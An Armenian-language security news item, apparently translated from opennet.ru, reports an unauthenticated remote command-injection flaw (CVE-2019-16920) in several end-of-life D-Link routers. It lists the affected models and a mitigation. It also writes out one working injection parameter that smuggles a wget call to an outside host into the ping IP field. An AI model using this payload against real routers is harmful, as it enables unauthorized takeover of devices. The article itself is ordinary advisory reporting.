Հեռակա շահագործվող խոցելիություն D-Link երթուղիչներում

D-Link անլար երթուղիչներում բացահայտված վտանգավոր խոցելիություն (CVE-2019–16920), որը թույլ է տալիս հեռակա կարգով կատարել կոդը սարքի կողմից՝ հատուկ հարցում ուղարկելով «ping_test» մշակողին, որը հասանելի է առանց նույնականացման:

Հետաքրքիր է, որ որոնվածը մշակողների կարծիքով, «ping_test» զանգը պետք է կատարվի միայն վավերացումից հետո, բայց իրականում այն ​​կանչվում է ամեն դեպքում՝ անկախ վեբ ինտերֆեյս մուտք գործելուց։ Մասնավորապես, application_sec.cgi սկրիպտին մուտք գործելիս և «action=ping_test» պարամետրը փոխանցելիս սկրիպտը վերահղվում է վավերացման էջ, բայց միևնույն ժամանակ կատարում է ping_test-ի հետ կապված գործողությունը։ Կոդը գործարկելու համար մեկ այլ խոցելիություն է օգտագործվել հենց ping_test-ում, որը կանչում է ping կոմունալ ծրագիրը՝ առանց պատշաճ կերպով ստուգելու փորձարկման ուղարկված IP հասցեի ճիշտությունը: Օրինակ՝ wget կոմունալ ծառայությունը կանչելու և «echo 1234» հրամանի արդյունքները արտաքին հոսթին փոխանցելու համար պարզապես նշեք «ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://» պարամետրը: test.test/?$( echo 1234)»:

Հեռակա շահագործվող խոցելիություն D-Link երթուղիչներում

Խոցելիության առկայությունը պաշտոնապես հաստատվել է հետևյալ մոդելներում.

  • DIR-655 3.02b05 կամ ավելի հին որոնվածով;
  • DIR-866L 1.03b04 կամ ավելի հին որոնվածով;
  • DIR-1565 1.01 կամ ավելի հին որոնվածով;
  • DIR-652 (որոնք խնդրահարույց տարբերակների մասին տեղեկություններ չեն տրամադրվում)

Այս մոդելների աջակցության ժամկետն արդեն սպառվել է, ուստի D-Link-ը հայտարարեց, որը չի թողարկի թարմացումներ նրանց համար՝ խոցելիությունը վերացնելու համար, խորհուրդ չի տալիս դրանք օգտագործել և խորհուրդ է տալիս դրանք փոխարինել նոր սարքերով։ Որպես անվտանգության լուծում, դուք կարող եք սահմանափակել մուտքը դեպի վեբ միջերես միայն վստահելի IP հասցեներով:

Ավելի ուշ պարզվեց, որ խոցելիությունը նույնպես եղել է ազդում է DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 և DIR-825 մոդելները, որոնց թարմացումների թողարկման պլանները դեռ հայտնի չեն:

Source: opennet.ru

Добавить комментарий